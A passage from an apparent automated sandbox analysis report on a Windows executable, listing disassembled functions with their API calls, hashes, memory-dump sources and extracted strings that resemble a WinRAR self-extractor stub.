                                                                          • Opcode Fuzzy Hash: 9561825deedd86b63efd9f14b5c2eafcd73d0a2ab6cea4e4002f4f0d72b8ee82
                                                                          • Instruction Fuzzy Hash: 76014433509A356BD3126374BC95A9B362AEFC23B0F690034F51093192EEB88C0B7221
                                                                          Function 00F10EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F111CF: ResetEvent.KERNEL32(?), ref: 00F111E1
                                                                            • Part of subcall function 00F111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00F111F5
                                                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00F10F21
                                                                          • CloseHandle.KERNEL32(?,?), ref: 00F10F3B
                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 00F10F54
                                                                          • CloseHandle.KERNEL32(?), ref: 00F10F60
                                                                          • CloseHandle.KERNEL32(?), ref: 00F10F6C
                                                                            • Part of subcall function 00F10FE4: WaitForSingleObject.KERNEL32(?,000000FF,00F11206,?), ref: 00F10FEA
                                                                            • Part of subcall function 00F10FE4: GetLastError.KERNEL32(?), ref: 00F10FF6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                          • String ID:
                                                                          • API String ID: 1868215902-0
                                                                          • Opcode ID: 018f3d3a8507708ada0ca47d7f11f95aefe94aa7ceef7623212129010faa21f1
                                                                          • Instruction ID: 7a188383f7d8347f7d1a066e8e1e3367e7b8c40f425727a1898c64ba472ae828
                                                                          • Opcode Fuzzy Hash: 018f3d3a8507708ada0ca47d7f11f95aefe94aa7ceef7623212129010faa21f1
                                                                          • Instruction Fuzzy Hash: 190175B5500744EFC726DB64DC85BC6FBAAFB08725F000929F25B92160CBB57A85EB50
                                                                          Function 00F2C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00F2C817
                                                                            • Part of subcall function 00F28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?), ref: 00F28DE2
                                                                            • Part of subcall function 00F28DCC: GetLastError.KERNEL32(?,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?,?), ref: 00F28DF4
                                                                          • _free.LIBCMT ref: 00F2C829
                                                                          • _free.LIBCMT ref: 00F2C83B
                                                                          • _free.LIBCMT ref: 00F2C84D
                                                                          • _free.LIBCMT ref: 00F2C85F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: 7a92d7079690c5271157a582a21b2aa54c98689ce7c190dc7577559281010e5b
                                                                          • Instruction ID: 99d07061ce98d57bc2ddfdf5383dff8e0f66b24dfcbb6d51d7bc114bb8e6a210
                                                                          • Opcode Fuzzy Hash: 7a92d7079690c5271157a582a21b2aa54c98689ce7c190dc7577559281010e5b
                                                                          • Instruction Fuzzy Hash: 3CF01232906224AB9620DB68F885C5B73EAAE007747A55C19F148D75A2CB74FC81EAA4
                                                                          Function 00F11FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00F11FE5
                                                                          • _wcslen.LIBCMT ref: 00F11FF6
                                                                          • _wcslen.LIBCMT ref: 00F12006
                                                                          • _wcslen.LIBCMT ref: 00F12014
                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00F0B371,?,?,00000000,?,?,?), ref: 00F1202F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$CompareString
                                                                          • String ID:
                                                                          • API String ID: 3397213944-0
                                                                          • Opcode ID: f228500a95e9fa470f39b2ad61dd2d05108e8a818ae9c7972144456872a4e42d
                                                                          • Instruction ID: 96d5375faee63a64b89ebc4727df68e4bcead780887bbb60ce756d307fa458c3
                                                                          • Opcode Fuzzy Hash: f228500a95e9fa470f39b2ad61dd2d05108e8a818ae9c7972144456872a4e42d
                                                                          • Instruction Fuzzy Hash: 57F03073008024BFCF266F91EC09DCE7F26EB44770B128415F65A5B061CB76DAA9E6D0
                                                                          Function 00F28900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00F2891E
                                                                            • Part of subcall function 00F28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?), ref: 00F28DE2
                                                                            • Part of subcall function 00F28DCC: GetLastError.KERNEL32(?,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?,?), ref: 00F28DF4
                                                                          • _free.LIBCMT ref: 00F28930
                                                                          • _free.LIBCMT ref: 00F28943
                                                                          • _free.LIBCMT ref: 00F28954
                                                                          • _free.LIBCMT ref: 00F28965
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: 9e299ec2172599c53c07a308eb7515cfa9864af94511b6946d74b53db384634e
                                                                          • Instruction ID: 2b5cef7028f1dc9197cc2a22f6eec40c9cfaac66c94edd005e14100dccb7dd08
                                                                          • Opcode Fuzzy Hash: 9e299ec2172599c53c07a308eb7515cfa9864af94511b6946d74b53db384634e
                                                                          • Instruction Fuzzy Hash: F8F05E7181393ACBE6866F14FC024093FB5FB247603410A16F024922B6CFBE499BFB81
                                                                          Function 00F115FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _swprintf
                                                                          • String ID: %ls$%s: %s
                                                                          • API String ID: 589789837-2259941744
                                                                          • Opcode ID: bee013198e8ea4f1d9c8d38b1d835596d44d51d40275f6386f2ff8f55ee413e3
                                                                          • Instruction ID: 9d2691f6e063468ab1c5fbe3b176276223efd8e7b4ec81227db40ed92c7bd387
                                                                          • Opcode Fuzzy Hash: bee013198e8ea4f1d9c8d38b1d835596d44d51d40275f6386f2ff8f55ee413e3
                                                                          • Instruction Fuzzy Hash: 5A51F637688304FAF7211AA08D46FF57265BB05B14F28C947F386644E1D9A7A8D0BB1F
                                                                          Function 00F27F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ZZ2sTsJFrt.exe,00000104), ref: 00F27FAE
                                                                          • _free.LIBCMT ref: 00F28079
                                                                          • _free.LIBCMT ref: 00F28083
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$FileModuleName
                                                                          • String ID: C:\Users\user\Desktop\ZZ2sTsJFrt.exe
                                                                          • API String ID: 2506810119-1016543536
                                                                          • Opcode ID: 81398acdec099085405749a1d9ab6fcd97579bbd31af20033299a7b53dc90eed
                                                                          • Instruction ID: 02dee4d98013e7d6a5712fc81b07a2b3612820384f02d7d59d9ae3753c952244
                                                                          • Opcode Fuzzy Hash: 81398acdec099085405749a1d9ab6fcd97579bbd31af20033299a7b53dc90eed
                                                                          • Instruction Fuzzy Hash: D131C471E05228AFDB21DF99EC8099EBBBCEF85350F104166F80497211DBB58E45EB91
                                                                          Function 00F231D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F231FB
                                                                          • _abort.LIBCMT ref: 00F23306
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer_abort
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 948111806-2084237596
                                                                          • Opcode ID: 45cba5c8d359c677a9f2287c8eefce7fe5693ae94345140d622b36475679bf90
                                                                          • Instruction ID: 053724d11c312f9d8a5ce73d1888102320358191e6852867ad669fdd4d3045e4
                                                                          • Opcode Fuzzy Hash: 45cba5c8d359c677a9f2287c8eefce7fe5693ae94345140d622b36475679bf90
                                                                          • Instruction Fuzzy Hash: 974159B1D00229EFCF16DF94EC81AEEBBB5BF08314F158059F90467251D739AA50EB50
                                                                          Function 00F07401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F07406
                                                                            • Part of subcall function 00F03BBA: __EH_prolog.LIBCMT ref: 00F03BBF
                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00F074CD
                                                                            • Part of subcall function 00F07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F07AAB
                                                                            • Part of subcall function 00F07A9C: GetLastError.KERNEL32 ref: 00F07AF1
                                                                            • Part of subcall function 00F07A9C: CloseHandle.KERNEL32(?), ref: 00F07B00
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                          • API String ID: 3813983858-639343689
                                                                          • Opcode ID: 8d44ba95ede59ebd888d45bc0454b8a00c7ca03fbd9b4db2d56c8077ddd2f14e
                                                                          • Instruction ID: 9299e7866fb33358a1db266ec6d5f840ab1d3ade8db96ad4803b39cfb9a40a2c
                                                                          • Opcode Fuzzy Hash: 8d44ba95ede59ebd888d45bc0454b8a00c7ca03fbd9b4db2d56c8077ddd2f14e
                                                                          • Instruction Fuzzy Hash: 5131D4B1E04358AADF11EBA4CC45BFE7BA9BF05324F044055F805A72D2C778AA84FB61
                                                                          Function 00F1AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • EndDialog.USER32(?,00000001), ref: 00F1AD98
                                                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00F1ADAD
                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F1ADC2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemText$DialogWindow
                                                                          • String ID: ASKNEXTVOL
                                                                          • API String ID: 445417207-3402441367
                                                                          • Opcode ID: 9ee767e4fb632d620408ea913ce7f86986b6a4fd0f6fa642f75c7b4520d77dcb
                                                                          • Instruction ID: 4893235552269d8d7585af93db1f2f7508dab89b0ddfab8e323397c094a99b75
                                                                          • Opcode Fuzzy Hash: 9ee767e4fb632d620408ea913ce7f86986b6a4fd0f6fa642f75c7b4520d77dcb
                                                                          • Instruction Fuzzy Hash: AE11E232A41614BFD3228F68EC45FEA3B69FF4B712F040000F241DB4A4C7A29985B723
                                                                          Function 00F0D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __fprintf_l.LIBCMT ref: 00F0D954
                                                                          • _strncpy.LIBCMT ref: 00F0D99A
                                                                            • Part of subcall function 00F11DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00F41030,00000200,00F0D928,00000000,?,00000050,00F41030), ref: 00F11DC4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                          • String ID: $%s$@%s
                                                                          • API String ID: 562999700-834177443
                                                                          • Opcode ID: 9ddcfc98ef02364985c8edd9f99d90b8c5aad8254913c7cc6485f897604cbe23
                                                                          • Instruction ID: 635c17d37727a91204b90e8d0034f889228bd92c6aca9b2275158e6fc4f538c9
                                                                          • Opcode Fuzzy Hash: 9ddcfc98ef02364985c8edd9f99d90b8c5aad8254913c7cc6485f897604cbe23
                                                                          • Instruction Fuzzy Hash: 3921A23284024CAEDF20EEE4CC01FEE7BA8AF05710F040522F910961E2E675D658FB51
                                                                          Function 00F10E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00F0AC5A,00000008,?,00000000,?,00F0D22D,?,00000000), ref: 00F10E85
                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00F0AC5A,00000008,?,00000000,?,00F0D22D,?,00000000), ref: 00F10E8F
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00F0AC5A,00000008,?,00000000,?,00F0D22D,?,00000000), ref: 00F10E9F
                                                                          Strings
                                                                          • Thread pool initialization failed., xrefs: 00F10EB7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                          • String ID: Thread pool initialization failed.
                                                                          • API String ID: 3340455307-2182114853
                                                                          • Opcode ID: 3f5adf131419ef0ee5c80097896a3ee0dd071350823fd2a909b200bfb13ae823
                                                                          • Instruction ID: 370190099f7c02e6106b30c0412fbe15fd067ba463e17954cc1e8b1ff5b7c8df
                                                                          • Opcode Fuzzy Hash: 3f5adf131419ef0ee5c80097896a3ee0dd071350823fd2a909b200bfb13ae823
                                                                          • Instruction Fuzzy Hash: A31194B1A407089FD3215F669C849A7FBDCEB54764F14482EF1D6C3200DAB159C0AB50
                                                                          Function 00F1B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • EndDialog.USER32(?,00000001), ref: 00F1B2BE
                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00F1B2D6
                                                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 00F1B304
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemText$DialogWindow
                                                                          • String ID: GETPASSWORD1
                                                                          • API String ID: 445417207-3292211884
                                                                          • Opcode ID: 741bc9e3bc771e6b071c39eaba9b75964b506beca4d3504d8230e1b35ee543d4
                                                                          • Instruction ID: aa46b39b8f86f0d10c6a59e76d9c8241d531fa64d22cad398d750d7e877866c9
                                                                          • Opcode Fuzzy Hash: 741bc9e3bc771e6b071c39eaba9b75964b506beca4d3504d8230e1b35ee543d4
                                                                          • Instruction Fuzzy Hash: 6B11C432D00119F6DB229A649D49FFF376CEF5A720F000020FA46F24C0C7B5AA99B761
                                                                          Function 00F1DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                          • API String ID: 0-56093855
                                                                          • Opcode ID: c6e9c5e0b94edce83ab9ba8ef1f10f1fd8a8b949c61ddb97420fe1dc73fb9215
                                                                          • Instruction ID: 2f7aa5767dac8304867bdd3a8cb5cef0177a65fe7c3bfbfcd5a885f5bacdd072
                                                                          • Opcode Fuzzy Hash: c6e9c5e0b94edce83ab9ba8ef1f10f1fd8a8b949c61ddb97420fe1dc73fb9215
                                                                          • Instruction Fuzzy Hash: 31015A7AA04249AFDB119F68FC44ADA7BB9F75A3A4B100429F90593231C6319891FBA0
                                                                          Function 00F1DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00F1DBF4
                                                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F1DC30
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
